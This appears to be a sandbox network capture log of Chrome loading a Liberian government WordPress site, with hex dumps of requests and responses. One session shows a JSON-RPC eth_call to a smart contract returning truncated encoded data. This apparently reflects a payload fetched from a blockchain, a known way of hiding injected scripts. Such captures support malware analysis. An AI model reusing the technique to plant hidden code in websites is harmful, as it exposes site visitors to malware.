                                                                                                                        2025-01-10 13:54:51 UTC173OUTData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 22 33 62 37 35 33 31 62 64 2d 62 37 35 36 2d 34 34 32 63 2d 38 37 32 64 2d 39 31 66 63 62 37 39 65 31 31 39 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 65 74 68 5f 63 61 6c 6c 22 2c 22 70 61 72 61 6d 73 22 3a 5b 7b 22 74 6f 22 3a 22 30 78 39 31 37 39 64 64 61 38 42 32 38 35 30 34 30 42 66 33 38 31 41 41 42 62 38 61 31 66 34 61 31 62 38 63 33 37 45 64 35 33 22 2c 22 64 61 74 61 22 3a 22 30 78 37 31 31 34 35 32 65 36 22 7d 2c 22 6c 61 74 65 73 74 22 5d 7d
                                                                                                                        Data Ascii: {"jsonrpc":"2.0","id":"3b7531bd-b756-442c-872d-91fcb79e1190","method":"eth_call","params":[{"to":"0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53","data":"0x711452e6"},"latest"]}
                                                                                                                        2025-01-10 13:54:51 UTC602INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:51 GMT
                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                        Content-Length: 1035
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Headers: *
                                                                                                                        Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Max-Age: 600
                                                                                                                        X-Nr-Trace-Id: 7311ea978c9868acf3b25e700650c238
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Referrer-Policy: origin-when-cross-origin
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                        2025-01-10 13:54:51 UTC1035INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 22 33 62 37 35 33 31 62 64 2d 62 37 35 36 2d 34 34 32 63 2d 38 37 32 64 2d 39 31 66 63 62 37 39 65 31 31 39 30 22 2c 22 72 65 73 75 6c 74 22 3a 22 30 78 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 39 38 34 38 33 34 37 33 34 39 34 31 34 36 35 37 37 35 35 31 33 32 36 33 34 33 32 66 32 62 33 32 35 37 37 37 35 37 37 32 34 34 34 64 34 31 37 39 34 37 33 37 33 33 33 32
                                                                                                                        Data Ascii: {"jsonrpc":"2.0","id":"3b7531bd-b756-442c-872d-91fcb79e1190","result":"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000001984834734941465775513263432f2b3257775772444d417947373332


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        77192.168.2.749885192.0.77.484432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:51 UTC602OUTGET /images/core/emoji/15.0.3/svg/2705.svg HTTP/1.1
                                                                                                                        Host: s.w.org
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:51 UTC464INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:51 GMT
                                                                                                                        Content-Type: image/svg+xml
                                                                                                                        Content-Length: 482
                                                                                                                        Connection: close
                                                                                                                        Last-Modified: Tue, 30 Jan 2024 01:18:35 GMT
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                        X-nc: HIT jfk 2
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        2025-01-10 13:54:51 UTC482INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 36 20 33 36 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 37 37 42 32 35 35 22 20 64 3d 22 4d 33 36 20 33 32 63 30 20 32 2e 32 30 39 2d 31 2e 37 39 31 20 34 2d 34 20 34 48 34 63 2d 32 2e 32 30 39 20 30 2d 34 2d 31 2e 37 39 31 2d 34 2d 34 56 34 63 30 2d 32 2e 32 30 39 20 31 2e 37 39 31 2d 34 20 34 2d 34 68 32 38 63 32 2e 32 30 39 20 30 20 34 20 31 2e 37 39 31 20 34 20 34 76 32 38 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 22 20 64 3d 22 4d 32 39 2e 32 38 20 36 2e 33 36 32 63 2d 31 2e 31 35 36 2d 2e 37 35 31 2d 32 2e 37 30 34 2d 2e 34 32 32 2d 33 2e 34 35 38 2e 37 33 36 4c 31 34 2e
                                                                                                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#77B255" d="M36 32c0 2.209-1.791 4-4 4H4c-2.209 0-4-1.791-4-4V4c0-2.209 1.791-4 4-4h28c2.209 0 4 1.791 4 4v28z"/><path fill="#FFF" d="M29.28 6.362c-1.156-.751-2.704-.422-3.458.736L14.


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        78192.168.2.74989269.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:52 UTC489OUTGET /wp-content/uploads/2024/02/mandate2-1536x1152-1.png HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:52 UTC365INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:52 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Mon, 05 Feb 2024 10:28:59 GMT
                                                                                                                        ETag: "1cc9f-6109fedff67fb"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 117919
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:52 GMT
                                                                                                                        Vary: User-Agent,Accept-Encoding
                                                                                                                        Content-Type: image/png
                                                                                                                        2025-01-10 13:54:52 UTC7827INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 06 00 00 00 04 80 08 02 00 00 00 b6 a3 11 cd 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0c 91 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 36 30 2c 20 32 30 32 30 2f 30 35 2f 31 32 2d 31 36 3a 30 34 3a 31 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                                                                                        Data Ascii: PNGIHDRpHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RD
                                                                                                                        2025-01-10 13:54:52 UTC8000INData Raw: 39 eb 34 a4 cd 77 f5 8d 09 7f d2 f5 f7 6e ed 69 52 f4 b7 4f bb 12 ae 33 7a 70 8c 40 8f 9a 31 a4 15 78 33 bc a3 86 15 cf 29 ad d8 b1 68 fb e5 75 17 ea e7 ee 63 34 8d 68 f3 0b ab 14 c2 2b 2a 3f c1 33 d4 7b 2d ef 2b 8f 90 52 52 34 51 f9 9c ce 2f ac 52 8e 21 fe ee e0 4b 1a 13 a7 68 d1 84 05 ca c1 94 78 9f d7 ad 7b e7 59 e5 32 7f d7 88 49 46 7c ea d8 f5 f9 a5 07 9f 7b 48 4d 75 f3 a4 79 de 5c e8 9e c1 80 2e ff e3 b2 f2 0a 59 99 83 54 66 b8 e3 4e 3a 00 40 8e 00 10 00 a7 aa 2d ab 51 b8 bb 13 05 bb 3b dd f1 20 57 5f 76 ce 3a 6d 69 8b 19 5e 91 68 bd a0 74 a7 9d 8a 0b ff 7b 41 db 0f 1b ba 1a 37 ef af d5 25 0d de 0c 6f 49 d1 c4 e7 1e de 78 79 dd 85 5d b3 5f 4e 76 0e 29 57 72 c4 f7 5f b5 07 5e 50 5e a1 b2 e4 41 cd 7f 3d 7a e6 98 11 9f 3d 0a 82 70 cf 48 a5 bc 0d f7 85
                                                                                                                        Data Ascii: 94wniRO3zp@1x3)huc4h+*?3{-+RR4Q/R!Khx{Y2IF|{HMuy\.YTfN:@-Q; W_v:mi^ht{A7%oIxy]_Nv)Wr_^P^A=z=pH
                                                                                                                        2025-01-10 13:54:52 UTC8000INData Raw: 25 d1 4b 1e bf fb a7 92 57 9c 0e 9c 78 fb 99 37 7e 15 2f 91 0a e7 22 5e 67 2b d8 dd d9 70 fa dd e6 bf 34 9f bd fc 71 64 70 5c ef d7 bd e3 87 8d 8b 59 74 bd 19 de 67 7f bc be 60 f5 ed f1 76 64 09 87 56 49 d3 4e ca ca 29 4f c5 8c fe b4 04 5b 4f 9c 3b 79 f0 cc 21 b1 dc 46 c4 2c c0 c1 ee 4e e5 c1 b3 2c 2f 63 1a 4e c4 c2 fa 25 92 11 43 3c 69 9e 45 13 16 54 d6 cd 93 6e 25 91 87 c6 55 49 f6 fe fa f1 18 a3 ff 58 9e 4b 49 59 58 bf 64 64 ee 08 49 82 c5 96 f0 95 e3 3b 57 4e 5f 1e f3 58 b6 d6 6f 4b 7d 9c b5 54 58 db 20 08 29 b4 09 e6 5c a3 8d bb d6 98 5f bc 95 73 ec 54 47 f3 9f ff 7a 56 65 8e 89 8f 85 22 43 b6 1b 7a 45 4e c8 e4 bd cb 4f 41 cc 0e 95 42 7d f1 a4 79 7e f9 c3 15 bb 9e 54 f5 d5 a7 b3 9a 41 00 46 20 00 d4 4f 3d e1 5f 1c f3 b2 1d ea 09 c5 9c 8a 25 72 31 13
                                                                                                                        Data Ascii: %KWx7~/"^g+p4qdp\Ytg`vdVIN)O[O;y!F,N,/cN%C<iETn%UIXKIYXddI;WN_XoK}TX )\_sTGzVe"CzENOAB}y~TAF O=_%r1
                                                                                                                        2025-01-10 13:54:52 UTC8000INData Raw: 00 46 20 00 64 47 d7 7a ae 95 5c 69 ae f5 5c 1b f9 ff da b2 9a 99 81 19 31 af a3 22 4f 9a 27 2b 73 50 56 e6 a0 39 a5 15 4b 82 8f d7 1e 78 21 61 17 24 9a fc 3a 17 bd f7 a4 e8 b8 29 d1 fa d2 35 f7 16 4f c9 ca 1c 14 6f 85 14 8f 5d 1b f9 f9 fa f6 75 be 64 37 92 f0 d0 04 8b 8e 2e 5a 4e 7a f6 c6 59 eb c7 e4 8d 56 53 fc 66 06 66 1c 6e 3d f2 cc 1b bf 4a e5 f6 23 e0 f3 3f 7e f7 4f 55 ee 51 cc 96 35 75 cf 24 db 15 9b 5f 58 75 f7 6d 93 95 f7 12 d9 57 7e 56 5e 7e 56 9e b8 af 05 2f 2d 34 28 08 e2 bb fa 46 79 77 53 9e 18 85 04 fb ae be 31 d9 db 30 f3 cf af 7a 6a 2a 88 20 08 de 0c af 37 43 c8 ca 1c 54 52 34 71 f1 8c 45 a7 3b 5a 76 bc bf 33 61 35 31 ae 00 a8 39 8f ca 2b 28 9f 47 23 2a 88 5e 65 af a1 ab b1 bd ab bd a4 68 62 f4 9f c6 df f2 7d a1 5e 79 db 09 dc 5b 3c 45 92
                                                                                                                        Data Ascii: F dGz\i\1"O'+sPV9Kx!a$:)5Oo]ud7.ZNzYVSffn=J#?~OUQ5u$_XumW~V^~V/-4(FywS10zj* 7CTR4qE;Zv3a519+(G#*^ehb}^y[<E
                                                                                                                        2025-01-10 13:54:52 UTC8000INData Raw: 5a cf b5 d1 0b 4f 04 9b 22 b3 47 e9 2e d9 3d 4a 26 c2 54 f3 3c 56 e5 4f 02 3e ff e4 fc 52 c9 42 5d 8e 5d 92 00 c9 64 43 7a fd 44 41 4e 7a f6 2d 37 0e 2f ca 2a 94 2c df df 52 6f ce fb 3e 3a 1e 8e 39 39 f3 cf f0 3f 8f 9c 3f a6 4b e6 c4 2c e1 9d a1 ce 77 da 1b e4 29 d7 76 74 fa 66 af a4 16 c4 4b aa 71 09 d0 6b 53 ea f7 28 3f 41 82 7e 65 c0 e8 02 20 ce 1d 93 ec af 54 32 a1 82 44 68 2b 7b 31 e5 a4 67 37 ad 3e 16 7d 7f 15 ee 0b ff 60 cd d4 64 13 2c 19 bc e3 91 df 3e 6a e8 dd b2 d1 45 c5 b6 f5 34 de c5 37 de 1b 31 e6 b7 12 22 79 5d d3 5c 05 74 dc 94 c2 2e 8c a8 bc 76 68 a3 1c 54 53 e2 31 e2 ec cc 2f ac 1a e4 1d 24 08 42 67 a8 d3 29 71 3d 00 ee 40 00 c8 8e d4 07 80 00 00 70 b4 da b2 1a c9 14 63 2d c1 d6 82 d5 b7 27 bb 9d cb eb 2e 44 de 35 08 f5 84 6e 58 34 50 9f
                                                                                                                        Data Ascii: ZO"G.=J&T<VO>RB]]dCzDANz-7/*,Ro>:99??K,w)vtfKqkS(?A~e T2Dh+{1g7>}`d,>jE471"y]\t.vhTS1/$Bg)q=@pc-'.D5nX4P
                                                                                                                        2025-01-10 13:54:52 UTC8000INData Raw: 8b 32 3a 67 b4 31 27 55 a9 e7 9e d3 eb b2 06 56 55 7f a7 67 b5 85 cd a6 0d eb b8 d3 cf a6 06 4e bc 6e 26 34 77 72 a5 fa 72 35 bf b0 ea e9 8a d5 f2 f4 c7 ec 26 45 98 dc 3d 33 d9 b2 57 97 eb 72 74 62 ae 96 14 4d 6c 5a 7d 4c af d9 f1 4c ee d5 d8 b0 99 02 92 42 00 08 56 6a e8 6a dc d9 b0 5b be 7c 4e 69 45 f3 d2 0f d5 dc 55 ce 2f ac ea 58 71 76 fa d8 32 41 10 3c 69 9e 65 33 7f 6e 93 6f 92 d5 28 cf 9d 56 3f 77 df 63 65 d5 f2 4e 46 4b b0 35 de c7 de ca 99 96 f0 f0 6b cb 6a 5e 5b b2 57 7e 05 0a 76 77 96 6f bf 3f e6 4f e4 2f 1e cf 0c cc 50 73 76 02 3e ff 9b 0b f7 59 3b 00 e4 a6 a6 2d 07 4e bc 2d 5f ae 26 bb 72 d2 b3 6b cb 6a 5e 78 e4 79 33 0f 21 27 3d 7b 66 60 86 37 c3 fb 58 59 75 c7 8a b3 b5 65 35 2a 8b 74 c0 e7 5f 36 f3 e7 92 85 31 47 2b b0 aa de 75 86 3a 25 4b
                                                                                                                        Data Ascii: 2:g1'UVUgNn&4wrr5&E=3WrtbMlZ}LLBVjj[|NiEU/Xqv2A<ie3no(V?wceNFK5kj^[W~vwo?O/Psv>Y;-N-_&rkj^xy3!'={f`7XYue5*t_61G+u:%K
                                                                                                                        2025-01-10 13:54:52 UTC8000INData Raw: df a1 1a 49 c1 06 ba 54 91 f5 30 7f 54 c2 6b 23 3d fd bd 2a 3f 53 0f 7b 17 ec e2 6d 64 c0 09 0e 06 7b fa 7b af 7f 77 9d 11 3d 5c 6c cc 6d 63 e6 4e e6 8f 2b 20 11 b1 cc 27 76 3f 1a fa 16 c2 08 df 69 88 ee 42 a5 ae a1 ee ca a6 c5 4c 13 53 96 31 67 4a 56 d1 dd 63 ee 4a b3 a7 4a dc 84 62 62 56 c1 c9 9a e3 85 75 45 91 81 e4 5b 9c b9 6e 6e e5 e8 91 66 13 5d e3 a1 96 b1 e3 85 e6 8d 51 04 81 29 25 ba 82 a8 ac 3d 66 bd 71 bc 81 77 67 53 8e 23 bb 3a af 8a f7 a0 62 59 c6 1c de 06 52 ed 81 8e bd 17 0f 10 4a 25 c8 87 05 20 d0 c5 d7 a1 af 85 81 9e 6d b3 88 27 84 5e b2 1e e6 8f 6a f4 0f 47 f3 42 b8 91 86 2a 6e bb 8b 77 28 00 c3 30 c1 c1 e0 ae e3 6f 4b bc c3 79 93 67 bd 0e e9 8a 0b 24 33 5f d8 e4 d9 1b 59 f1 03 23 94 41 df 42 18 b1 92 65 d0 5d 68 6a ef c5 03 e1 f9 b7 db
                                                                                                                        Data Ascii: IT0Tk#=*?S{md{{w=\lmcN+ 'v?iBLS1gJVcJJbbVuE[nnf]Q)%=fqwgS#:bYRJ% m'^jGB*nw(0oKyg$3_Y#ABe]hj
                                                                                                                        2025-01-10 13:54:52 UTC8000INData Raw: b0 09 6c 69 ee 6c 89 1f c5 8b b4 77 20 20 77 1a 40 60 ca a4 00 25 ad 8f ce cc 01 f5 b0 00 14 bf 82 83 41 e9 37 b5 16 d6 15 b5 07 3a 78 81 23 fe 50 d9 fc b3 4d bc 2e 5e 56 a4 5d 43 dd c2 78 d9 04 b6 d6 fb ac 94 b7 eb 64 bb 6f 87 f4 4b ca 66 cf 81 e6 7e ff b6 c3 8d 69 ab 32 65 8d 19 f5 ad 0d 7b 9a f7 f1 02 75 da 89 90 4e b2 2a 49 65 d3 e2 0d fb 36 0a c3 95 1d de 41 a0 5d 33 94 55 0c 59 b9 2d 42 7a d6 55 36 2d 8e 3a d7 e1 70 ab 3f 52 72 a6 be b5 61 db e1 46 61 b8 2b 73 84 2d 27 48 e6 ff b3 0f 3f 23 9c a9 9f be 70 a6 b0 ae 48 e2 15 da b5 fe 0d e1 5f f2 ed 81 8e 47 d6 cf 8e 5a 5e 66 ef 2d 4d 87 58 c9 32 94 f5 18 7a 18 fb a3 b1 bc 90 f3 3d ed b2 7e 88 72 cb 40 22 2f 20 df 40 48 d6 10 ad 68 9b e6 48 6a 8e d3 52 36 48 7d 1d fa 9a 17 22 7e 10 18 c3 30 9e 6d b3 9e
                                                                                                                        Data Ascii: lilw w@`%A7:x#PM.^V]CxdoKf~i2e{uN*Ie6A]3UY-BzU6-:p?RraFa+s-'H?#pH_GZ^f-MX2z=~r@"/ @HhHjR6H}"~0m
                                                                                                                        2025-01-10 13:54:52 UTC8000INData Raw: c5 3a c5 9d 23 99 5a 11 87 e5 12 46 a6 e6 2b 8e 25 32 ba 85 9e 0a 86 61 46 bc b1 3f de 90 29 41 1e 63 bb 6b c5 d4 74 47 c5 f9 d3 fc 69 c7 e6 d5 2d 90 95 6c 63 33 4a d9 f7 25 d6 1f aa e9 16 b8 fc c9 73 de 57 b9 ed 09 ca c7 7d aa 62 37 69 cb 25 c6 d8 2a 41 09 f2 99 40 7f b5 24 d6 2b 92 cf 0a 95 d3 b3 e2 fc 69 27 6f 3c 5e 58 57 a4 ec ed ca 18 3e 76 30 aa 7f dd 00 49 b8 03 88 5e 23 76 79 c1 c1 60 70 30 28 f2 82 1c 47 f6 ee 9a 9d ca 6e c1 b8 e7 ce 4c 35 dd 1f 37 e6 95 65 cc 11 7f 59 7a a2 53 fd f8 c1 30 cc b6 c3 8d 34 ef c1 16 e9 96 9b 6e d1 75 f5 47 93 5a 11 87 e5 12 e6 b4 3b 09 d4 7c 86 61 dc e3 1e d2 64 98 5c e8 a9 c0 7d 40 91 88 95 60 24 63 bb 6b c5 54 76 47 0c c3 d8 92 6c b2 92 6d 6c 46 29 fb be c4 fa c3 46 ef 56 59 f7 61 45 e5 48 4e a1 7c dc a7 2a 76 93
                                                                                                                        Data Ascii: :#ZF+%2aF?)AcktGi-lc3J%sW}b7i%*A@$+i'o<^XW>v0I^#vy`p0(GnL57eYzS04nuGZ;|ad\}@`$ckTvGlmlF)FVYaEHN|*v
                                                                                                                        2025-01-10 13:54:52 UTC8000INData Raw: 49 41 2b 50 9d 57 b5 b2 fc 57 d2 eb 06 9b c0 16 e7 4f 2b cc 9e f4 fc 8e 15 bc 6b 92 12 91 af 4e 72 63 64 13 d8 b9 93 bd 93 73 1e 5c b3 e7 b7 ca be 23 19 0a be 17 57 76 1b f6 6d 54 76 db 8e b1 cc db ca 28 87 26 c9 43 49 4d a3 bf 73 a6 a4 ab 34 dd 0c 67 ef 82 5d 72 17 08 1c c9 29 2f fe f7 ea e9 f7 15 af dc bf 9a d8 c3 56 8a 1b 02 9b c0 4e cc 2a 98 98 55 50 19 78 9c c0 ca 7b 24 63 e7 ab 6a aa 22 fa 61 ca 91 e9 90 29 19 7d c0 44 b0 00 44 1d 05 bd 39 0f 9b c0 2e f4 54 30 0c a3 a6 31 57 e7 55 bd 54 b1 4e 71 32 4e d6 1c 9f 98 55 a0 e0 8d dc 50 91 31 26 9d f0 f0 af 09 59 99 46 49 41 2b a0 38 e5 6c 02 fb 52 c5 3a 86 61 e4 4e 02 c8 57 27 c5 31 da 92 6c dc 77 a4 93 9a 9c 7c f1 bf 57 8f fd d1 d8 b7 cf ee d1 3c 55 fa 31 6f 2b a3 1c 9a 24 0f 25 35 cd 44 9d b3 b1 5d a5
                                                                                                                        Data Ascii: IA+PWWO+kNrcds\#WvmTv(&CIMs4g]r)/VN*UPx{$cj"a)}DD9.T01WUTNq2NUP1&YFIA+8lR:aNW'1lw|W<U1o+$%5D]


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        79192.168.2.74989169.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:52 UTC483OUTGET /wp-includes/js/comment-reply.min.js?ver=6.7.1 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:52 UTC367INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:52 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 13 Nov 2024 23:42:19 GMT
                                                                                                                        ETag: "bd2-626d3e2784d0d"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 3026
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:52 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:52 UTC3026INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 77 69 6e 64 6f 77 2e 61 64 64 43 6f 6d 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 76 29 7b 76 61 72 20 49 2c 43 2c 68 2c 45 3d 76 2e 64 6f 63 75 6d 65 6e 74 2c 62 3d 7b 63 6f 6d 6d 65 6e 74 52 65 70 6c 79 43 6c 61 73 73 3a 22 63 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 6c 69 6e 6b 22 2c 63 6f 6d 6d 65 6e 74 52 65 70 6c 79 54 69 74 6c 65 49 64 3a 22 72 65 70 6c 79 2d 74 69 74 6c 65 22 2c 63 61 6e 63 65 6c 52 65 70 6c 79 49 64 3a 22 63 61 6e 63 65 6c 2d 63 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 6c 69 6e 6b 22 2c 63 6f 6d 6d 65 6e 74 46 6f 72 6d 49 64 3a 22 63 6f 6d 6d 65 6e 74 66 6f 72 6d 22 2c 74 65 6d 70 6f 72 61 72 79 46 6f 72 6d 49 64 3a 22 77 70 2d 74
                                                                                                                        Data Ascii: /*! This file is auto-generated */window.addComment=function(v){var I,C,h,E=v.document,b={commentReplyClass:"comment-reply-link",commentReplyTitleId:"reply-title",cancelReplyId:"cancel-comment-reply-link",commentFormId:"commentform",temporaryFormId:"wp-t


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        80192.168.2.74988987.250.251.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:52 UTC589OUTGET /metrika/advert.gif HTTP/1.1
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:52 UTC1312INHTTP/1.1 200 OK
                                                                                                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cache-Control: max-age=3600
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 43
                                                                                                                        Content-Type: image/gif
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:52 GMT
                                                                                                                        ETag: "677fcb03-2b"
                                                                                                                        Expires: Fri, 10 Jan 2025 14:54:52 GMT
                                                                                                                        Last-Modified: Thu, 09 Jan 2025 13:11:31 GMT
                                                                                                                        Set-Cookie: _yasc=vH3G4lel4jCmbgNOK8sTqg6k/a2OreiVkyfBFMFgzQktA82WJhjhoTel+2NhXtVNZJE=; domain=.yandex.com; path=/; expires=Mon, 08 Jan 2035 13:54:52 GMT; secure
